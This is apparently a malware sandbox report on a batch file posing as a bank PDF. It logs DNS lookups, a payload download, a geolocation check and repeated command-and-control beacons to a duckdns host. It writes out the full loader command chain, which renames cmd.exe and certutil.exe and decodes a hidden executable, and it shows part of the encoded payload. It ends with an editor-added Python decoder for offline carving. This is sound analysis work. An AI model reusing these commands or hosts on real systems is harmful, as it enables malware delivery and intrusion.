                                                                                        Nov 20, 2024 07:53:22.626883984 CET8049710178.237.33.50192.168.2.8
                                                                                        Nov 20, 2024 07:53:22.627037048 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:53:51.123543024 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:51.125930071 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:51.130820990 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:54:21.438256025 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:54:21.439970016 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:54:21.444938898 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:54:51.861943960 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:54:51.863919973 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:54:51.868854046 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:55:10.978663921 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:55:11.369019032 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:55:12.056438923 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:55:13.353378057 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:55:15.853419065 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:55:20.759612083 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:55:22.195804119 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:55:22.199503899 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:55:22.204416037 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:55:30.369055033 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:55:52.673655033 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:55:52.676261902 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:55:52.681489944 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:56:23.040839911 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:56:23.042212963 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:56:23.047071934 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:56:53.448863983 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:56:53.451133966 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:56:53.456033945 CET476664970977.221.149.38192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 07:53:11.769628048 CET | 65226 | 53 | 192.168.2.8 | 1.1.1.1
Nov 20, 2024 07:53:12.097208977 CET | 53 | 65226 | 1.1.1.1 | 192.168.2.8
Nov 20, 2024 07:53:19.342160940 CET | 57065 | 53 | 192.168.2.8 | 1.1.1.1
Nov 20, 2024 07:53:19.457752943 CET | 53 | 57065 | 1.1.1.1 | 192.168.2.8
Nov 20, 2024 07:53:20.986335993 CET | 55107 | 53 | 192.168.2.8 | 1.1.1.1
Nov 20, 2024 07:53:20.993346930 CET | 53 | 55107 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 20, 2024 07:53:11.769628048 CET | 192.168.2.8 | 1.1.1.1 | 0xafee | Standard query (0) | ferreiragascuritiba.com.br | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:53:19.342160940 CET | 192.168.2.8 | 1.1.1.1 | 0x6496 | Standard query (0) | iamblessed.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:53:20.986335993 CET | 192.168.2.8 | 1.1.1.1 | 0xdc74 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 20, 2024 07:53:12.097208977 CET | 1.1.1.1 | 192.168.2.8 | 0xafee | No error (0) | ferreiragascuritiba.com.br | | 216.172.172.178 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:53:19.457752943 CET | 1.1.1.1 | 192.168.2.8 | 0x6496 | No error (0) | iamblessed.duckdns.org | | 77.221.149.38 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 07:53:20.993346930 CET | 1.1.1.1 | 192.168.2.8 | 0xdc74 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false

• ferreiragascuritiba.com.br
• geoplugin.net

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49707 | 216.172.172.178 | 80 | 7748 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 20, 2024 07:53:12.260776043 CET177OUTGET /v/233_Faogvkghvqn HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept: */*
                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                        Host: ferreiragascuritiba.com.br
Nov 20, 2024 07:53:12.721792936 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                        Date: Wed, 20 Nov 2024 06:53:12 GMT
                                                                                        Server: Apache
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, Keep-Alive
                                                                                        Last-Modified: Tue, 19 Nov 2024 04:59:53 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 1101508
                                                                                        Keep-Alive: timeout=5, max=75
                                                                                        Data Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 55 48 78 45 57 49 42 77 52 49 78 77 57 46 79 55 57 47 42 38 56 46 53 49 64 44 78 45 57 45 68 55 66 45 43 59 6a 46 52 73 52 49 78 6f 66 45 36 61 75 70 56 6b 6a 70 37 46 4c 55 51 34 63 46 43 4d 59 46 42 55 6a 48 68 75 6d 72 71 56 5a 49 36 65 78 53 33 52 70 64 33 4a 6f 62 48 64 6c 62 48 4a 35 65 4c 45 36 71 6b 35 4c 42 36 74 62 30 78 56 78 36 65 77 79 6a 69 47 44 44 2b 54 76 55 77 52 36 65 32 5a 4c 61 68 6a 2b 65 47 55 49 67 42 56 6a 48 68 72 71 6a 52 65 39 50 5a 46 4e 4f 43 4d 58 71 53 78 71 34 43 30 72 58 50 4d 30 66 63 4c 33 6c 51 38 34 41 56 70 53 5a 57 78 79 48 7a 45 49 73 77 65 78 4e 77 66 5a 62 6c 70 4c 6e 78 61 70 4c 46 51 65 68 37 71 49 34 4e 64 79 6b 52 6a 69 2f 49 51 65 62 57 72 6d 6d 42 4a 4c 53 51 5a 72 32 41 58 44 39 5a 52 34 31 76 4a 72 75 2b 71 59 63 4f 54 44 4e 56 2f 55 78 42 79 33 4c 67 68 2f 43 6e 77 51 57 54 30 4d 6c 68 50 6f 4f 70 43 6f 38 49 51 66 67 6e 48 30 42 72 6e 6a 51 34 67 6c 67 52 48 32 4c 63 32 35 6c 6e 57 4d 4b 78 76 79 2f 31 64 61 49 61 [TRUNCATED]
                                                                                        Data Ascii: pq6lWSOnsUsUHxEWIBwRIxwWFyUWGB8VFSIdDxEWEhUfECYjFRsRIxofE6aupVkjp7FLUQ4cFCMYFBUjHhumrqVZI6exS3Rpd3JobHdlbHJ5eLE6qk5LB6tb0xVx6ewyjiGDD+TvUwR6e2ZLahj+eGUIgBVjHhrqjRe9PZFNOCMXqSxq4C0rXPM0fcL3lQ84AVpSZWxyHzEIswexNwfZblpLnxapLFQeh7qI4NdykRji/IQebWrmmBJLSQZr2AXD9ZR41vJru+qYcOTDNV/UxBy3Lgh/CnwQWT0MlhPoOpCo8IQfgnH0BrnjQ4glgRH2Lc25lnWMKxvy/1daIaw2B5S1f18ibMzohRUQLFr/Z3nTcG38gQ76LbcETE0HUlalH7wDkxIO84ew5Wm89PSQF4kc8e9YVnhqceddlc90cUKUFfY0xHLihixoCXPinIabEu03FyQ+FY8v4CHHO4UY4i0SGN/8hSRWOX8SVD+bHd0/diaOKlVBTiilNRUp9jTy8C4MEoTwDE5lbFjtq5oUHTdTAQCblbFZsUFW0GJSxhK+OYcu8coSc3fvbNW94X5iEl2h8JN06sj8sCVq2Lucmsk1Vo0Gibb0ahCb87PlR4YVbkZZgCsPOOwf0jKM/GzT+44nFzVPAq0HVLQZdWnwNHa1iOI3jxL7QX4Xpj1STHJ2c1JgBswPknhLkB16MARMekJsd2USalXts61DCyQkXfxMYixzaXlIbQlrR2cIAlFzcrckq09YC0tzobAVdjskN5LjeskC2+n7emN9EVd0w22FF+cUd3KXc9XklBLiRykXanvwUFsNtzYCf3G5VKc3C38AWp6KJh1aclJhxl0GLt9Pinjqh+M83WJOlhb4aoBIA1RYgyfdQXJfqSexBVFXBqxGfmU2rSCzNZreMZPE9dggwUaaN4nA5ok/mhKpMZJbWHgEjSsVozaxanHhSo5itrWJhiSXeV5wfRk94R1oMHH8mltYeI
Nov 20, 2024 07:53:12.721932888 CET | 1236 | IN | Data Raw: 53 76 63 65 70 34 59 58 4d 43 6d 78 45 6b 50 30 31 51 6d 68 5a 4e 51 55 75 68 43 33 4b 64 56 6e 73 5a 6a 63 50 33 32 48 68 5a 61 51 68 33 54 59 41 59 79 45 56 38 4f 70 73 58 64 55 4b 58 33 68 4d 34 64 6a 65 5a 48 43 41 39 57 6c 6d 44 4a 39 31 42
                                                                                        Data Ascii: Svcep4YXMCmxEkP01QmhZNQUuhC3KdVnsZjcP32HhZaQh3TYAYyEV8OpsXdUKX3hM4djeZHCA9WlmDJ91BdYCrvk0IS01rCHFqY3KExruJbdt2iWl1k9y+hiGzN8dqWGj/T5kTlOY4AWeM98fVcSjfN3Nmi3muc5b2z1EJZXNt6W2P/3wSgd9yaGy3QTD1amgKhCCzNoLP+ndydjRxcCVqbxx4ZW5p9bNmd3JoN7BqWhEVY3Jw6
Nov 20, 2024 07:53:12.721954107 CET | 1236 | IN | Data Raw: 6c 34 59 6d 56 7a 62 58 64 6c 62 6d 6c 31 64 47 6c 33 63 6d 68 73 64 32 56 73 63 6e 46 6a 63 6e 42 70 63 33 4e 6d 61 33 6c 33 63 6e 5a 7a 61 58 68 69 5a 58 4e 74 64 32 56 75 61 58 56 30 61 58 64 79 61 47 78 33 5a 57 78 79 63 57 4e 79 63 47 6c 7a
                                                                                        Data Ascii: l4YmVzbXdlbml1dGl3cmhsd2VscnFjcnBpc3Nma3l3cnZzaXhiZXNtd2VuaXV0aXdyaGx3ZWxycWNycGlzc2ZreXdydnNpeGJlc213ZW5pdXRpd3JobHdlbHJxY3JwaXNzZmt5d3J2c2l4YmVzbXdlbml1dGl3cmhsd2VscnFjcnBpc3Nma3l3cnZzaXhiZXNtd2VuaXV0aXdyaGx3ZWxycWNycGlzc2ZreXdydnNpeGJlc213Z
Nov 20, 2024 07:53:12.721976995 CET | 1236 | IN | Data Raw: 64 6c 62 48 4a 78 59 33 4a 77 61 58 4e 7a 5a 6d 74 35 64 33 4a 32 63 32 6c 34 59 6d 56 7a 62 58 64 6c 62 6d 6c 31 64 47 6c 33 63 6d 68 73 64 32 56 73 63 6e 46 6a 63 6e 42 70 63 33 4e 6d 61 33 6c 33 63 6e 5a 7a 61 58 68 69 5a 58 4e 74 64 32 56 75
                                                                                        Data Ascii: dlbHJxY3JwaXNzZmt5d3J2c2l4YmVzbXdlbml1dGl3cmhsd2VscnFjcnBpc3Nma3l3cnZzaXhiZXNtd2VuaXV0aXdyaGx3ZWxycWNycGlzc2ZreXdydnNpeGJlc213ZW5pdXRpd3JobHdlbHJxY3JwaXNzZmt5d+k96CHjAO7o5pvvdvNp3tXdQfI33U/m4euD6HDwz+qq8kTeEN9N8Fv7fept32nmYd1w8WfqdORf7fwhExKSI
Nov 20, 2024 07:53:12.721990108 CET | 1236 | IN | Data Raw: 73 58 62 41 35 78 48 63 45 70 30 53 4b 70 4b 37 67 58 72 78 36 77 4a 4b 4d 62 52 78 34 4e 44 52 67 67 56 78 33 2f 47 67 63 6e 54 52 37 78 48 52 63 6f 46 68 73 52 49 35 4d 62 66 68 64 31 64 47 6c 32 6e 6d 69 4b 52 6d 58 69 61 74 2f 44 33 4d 7a 33
                                                                                        Data Ascii: sXbA5xHcEp0SKpK7gXrx6wJKMbRx4NDRggVx3/GgcnTR7xHRcoFhsRI5Mbfhd1dGl2nmiKRmXiat/D3Mz3v93O9anpnuir95zsRN006UDqBeFMaXdyW2yBRGxycfmacGlzf2aN+XfnjuaZ3J7xu+mz8e7tU+Dy4xLsjOOVIHojoyKgG0YhRRkJJQAmCxv+YmVzI3eTTmko/hwDJHQeXxVoJNETziLBI9cY0ynDJLYjpSqqFbcdp
Nov 20, 2024 07:53:12.722002983 CET | 1236 | IN | Data Raw: 54 6b 37 65 66 71 49 2f 73 71 36 43 76 72 6a 2b 35 2f 34 59 76 71 67 75 52 6c 33 32 62 79 58 2b 70 6a 38 74 4c 75 30 65 50 56 34 4d 62 76 73 4f 43 68 36 35 37 6d 74 2b 55 37 37 6b 62 6b 53 65 77 73 34 42 44 68 46 2b 34 47 39 55 2f 6b 54 2b 41 42
                                                                                        Data Ascii: Tk7efqI/sq6Cvrj+5/4YvqguRl32byX+pj8tLu0ePV4MbvsOCh657mt+U77kbkSews4BDhF+4G9U/kT+AB6eLi5+7c5RzrHfIQ5Y30lueV5IfwZ99z5Grlbd6+89fry/PK77nineGe7qjhOOpF5z7kM+8P5STtBeEI4E3vTPTe5d7h7ugb4yDvFeSE6pPzgOSF9m7lXeZf82/c2+fS5tXd1vCv6LPwouyh4TTiRe0v4kDpEOQn5
Nov 20, 2024 07:53:12.722014904 CET | 1236 | IN | Data Raw: 62 71 6c 65 47 61 37 49 66 6b 64 2b 31 79 38 57 33 63 58 64 39 69 38 47 44 66 62 65 52 6d 36 63 50 71 7a 50 48 62 36 38 4c 7a 79 64 2b 2b 33 73 76 78 76 50 71 6c 36 37 48 66 6e 65 61 64 33 61 54 78 71 2b 71 77 35 4b 50 74 4f 2b 6f 38 2b 30 6e 6f
                                                                                        Data Ascii: bqleGa7Ifkd+1y8W3cXd9i8GDfbeRm6cPqzPHb68Lzyd++3svxvPql67Hfnead3aTxq+qw5KPtO+o8+0noLOsy7kbhLuox6+ngIO0b5RPtAPEJ3E/fCPBM3wnkWukH6pHx+Ovh8+rf3d7o8d/6F+sj3w/mD90Y8ZfqhOSP7ZjqgfRu52Hkd/F73oPlduVl3mplc23XZYtIdXRp4wTsBuMF6Frlgub37dzn8e8n4ybik+2Q9pXnh
Nov 20, 2024 07:53:12.722029924 CET | 1236 | IN | Data Raw: 41 33 33 79 6e 6b 47 4f 6c 4e 36 67 62 78 54 65 73 45 38 2f 4c 66 34 64 37 6f 38 56 76 36 44 2b 73 50 33 34 6e 6d 66 64 32 49 38 59 50 6c 5a 4f 74 7a 38 6d 44 6c 5a 66 54 4f 35 37 33 6b 76 2f 48 50 33 72 76 6c 73 75 53 31 33 37 62 79 50 75 70 43
                                                                                        Data Ascii: A33ynkGOlN6gbxTesE8/Lf4d7o8Vv6D+sP34nmfd2I8YPlZOtz8mDlZfTO573kv/HP3rvlsuS137byPupC8jHuMOMl4BjvAuBP607mB+X77uDk7ewr4CrhEe6U9YHkgeCR6GXjcO9r5Gzq2/PY5L31xual5bfwt9+j5EnlLN498zbrG/Mc7wniS+FO7ljh3urh5/ghUBxNIgAaSyaTJfgc7xH2IuIm7h3uKCgcKSEUHyEYECGRE
Nov 20, 2024 07:53:12.722042084 CET | 1224 | IN | Data Raw: 4a 32 4f 6d 6c 39 37 57 56 7a 62 65 6c 73 34 4d 6a 72 7a 66 66 47 33 4e 48 69 45 2f 74 55 33 73 72 76 73 39 77 74 33 7a 6a 36 68 65 57 53 33 6f 72 6f 58 75 4d 6e 37 6c 66 6d 68 65 35 75 38 32 62 65 63 64 33 47 38 6b 66 64 51 65 62 39 36 32 48 72
                                                                                        Data Ascii: J2Oml97WVzbels4MjrzffG3NHiE/tU3srvs9wt3zj6heWS3oroXuMn7lfmhe5u82becd3G8kfdQeb962HrsvCG62LzZ99r3tDxRvqK5N/ha+r24d0cjSTZHqoVRSQuE/AiHyMkGIIqaSPJJKUpshanHvgWWhqHJZAocRh0KXgkwR+uHjIXUB3uFYB3cnYuaX0OZd1c6UrgWeuT94vfduFj+L3fx/i26w7qq/EG3h/kE+UP3iPzm
Nov 20, 2024 07:53:12.722058058 CET | 1236 | IN | Data Raw: 33 63 54 4f 57 4c 33 74 37 79 64 2b 68 64 35 6d 76 76 74 2b 69 69 2b 53 6a 71 66 4f 6d 47 37 32 62 67 61 2b 76 61 36 38 4c 67 51 2b 30 56 35 55 7a 79 61 2b 34 72 34 74 44 68 34 75 31 34 34 6d 7a 70 31 2b 53 72 35 2f 48 73 33 65 61 59 37 34 76 6a
                                                                                        Data Ascii: 3cTOWL3t7yd+hd5mvvt+ii+SjqfOmG72bga+va68LgQ+0V5Uzya+4r4tDh4u144mzp1+Sr5/Hs3eaY74vjcSZ0G18SzyGvJSwe+SfgGyAifSB+GKshPRLzIyQiAhVQW5cktyMkKv0VjB2SFl0a2iWrKDAZEijpHeUfex7EaXNzomt9RnJ2c/ez7DHeYOo14z7oT/Td3rrgPPkx3lfv9tyO6HvtouJR6GzpduLA76znRexq8D3d4
Nov 20, 2024 07:53:12.727005959 CET | 1236 | IN | Data Raw: 56 63 35 71 44 6c 6f 2f 41 7a 33 7a 50 6b 45 4f 56 51 33 68 54 7a 4b 75 68 35 38 48 6e 73 36 4f 43 72 34 35 77 63 6e 69 56 4d 49 4f 51 6a 6c 53 47 32 47 58 41 64 76 57 74 35 64 6f 4a 32 68 34 68 34 37 6e 7a 6f 75 4e 34 2b 35 76 76 64 36 76 48 64
                                                                                        Data Ascii: Vc5qDlo/Az3zPkEOVQ3hTzKuh58Hns6OCr45wcniVMIOQjlSG2GXAdvWt5doJ2h4h47nzouN4+5vvd6vHd6u7kJu0j6lv7JeZa5ZfzbtwN5vDnfCtIGPMdSBUcGewmhCeJGUopviTxHwoeIxd+c2Zr6neG6XP3wPmp6Kfcsetf4GTsGuch6Y7xZubR99QjWiMCF7EqNiMZJEwpgxbmI/Ab32l1dBt3hhhsd2Xioty43mP1X9/X9


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49710 | 178.237.33.50 | 80 | 8072 | C:\Windows\SysWOW64\SndVol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:53:21.006829023 CET | 71 | OUT | GET /json.gp HTTP/1.1
                                                                                        Host: geoplugin.net
                                                                                        Cache-Control: no-cache
Nov 20, 2024 07:53:21.627352953 CET | 1170 | IN | HTTP/1.1 200 OK
                                                                                        date: Wed, 20 Nov 2024 06:53:21 GMT
                                                                                        server: Apache
                                                                                        content-length: 962
                                                                                        content-type: application/json; charset=utf-8
                                                                                        cache-control: public, max-age=300
                                                                                        access-control-allow-origin: *
                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                        Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



                                                                                        Target ID:0
                                                                                        Start time:01:53:06
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "
                                                                                        Imagebase:0x7ff7a5000000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:01:53:06
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6ee680000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:01:53:06
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\System32\extrac32.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                                        Imagebase:0x7ff699a50000
                                                                                        File size:35'328 bytes
                                                                                        MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:01:53:07
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                        Imagebase:0x7ff6a0e70000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:01:53:07
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\System32\extrac32.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                        Imagebase:0x7ff699a50000
                                                                                        File size:35'328 bytes
                                                                                        MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:01:53:07
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                        Imagebase:0x7ff6a0e70000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:01:53:07
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\kn.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                        Imagebase:0x7ff68fc00000
                                                                                        File size:1'651'712 bytes
                                                                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:01:53:08
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                                                        Imagebase:0x7ff6a0e70000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:01:53:09
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\kn.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                                                        Imagebase:0x7ff68fc00000
                                                                                        File size:1'651'712 bytes
                                                                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true
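The two kn.exe invocations above (Target IDs 7 and 9) are renamed certutil.exe runs whose trailing numeric argument selects a CryptStringToBinary format: 9 is CRYPT_STRING_BASE64X509CRLHEADER (base64 between "-----BEGIN X509 CRL-----" / "-----END X509 CRL-----" markers) and 12 is CRYPT_STRING_HEXRAW (plain hex digits). The batch file therefore carries its payload as a CRL-framed base64 blob whose decoded content is a hex string of the final PE, written to AnyDesk.jpeg and then to AnyDesk.PIF. The Python below reproduces that two-pass decode offline so an analyst can carve the embedded executable without running certutil. It is an example added by the editor, not part of the Joe Sandbox report and not the loader's own code; the format-number meanings come from wincrypt.h, build_sample_bat() fabricates a harmless MZ/PE stub in place of the real .bat contents, and tolerating whitespace inside the hex stage is an assumption about what certutil accepts.

```python
import base64
import binascii
import re

# CryptStringToBinary format numbers that certutil -decodehex takes as its
# trailing argument (constants from wincrypt.h, not from the report).
CRYPT_STRING_BASE64X509CRLHEADER = 9
CRYPT_STRING_HEXRAW = 12

CRL_BLOCK = re.compile(
    r"-----BEGIN X509 CRL-----\s*(.*?)\s*-----END X509 CRL-----", re.S)


def decode_pass_9(text: str) -> bytes:
    """Stage 1 ('kn -decodehex -F <bat> AnyDesk.jpeg 9'): take the base64 body
    between the X509 CRL markers embedded in the batch file and decode it."""
    m = CRL_BLOCK.search(text)
    if m is None:
        raise ValueError("no X509 CRL block in input")
    body = re.sub(r"\s+", "", m.group(1))
    return base64.b64decode(body, validate=True)


def decode_pass_12(data: bytes) -> bytes:
    """Stage 2 ('kn -decodehex -F AnyDesk.jpeg AnyDesk.PIF 12'): treat the
    stage-1 output as raw hex digits and turn it into the final bytes.
    Assumption: whitespace between digits is ignored, as certutil does."""
    digits = re.sub(rb"\s+", b"", data)
    if len(digits) % 2 or not re.fullmatch(rb"[0-9A-Fa-f]*", digits):
        raise ValueError("stage-1 output is not a raw hex string")
    return binascii.unhexlify(digits)


def carve_payload(bat_text: str) -> bytes:
    """Run both passes, in the order the loader's two kn.exe runs do."""
    return decode_pass_12(decode_pass_9(bat_text))


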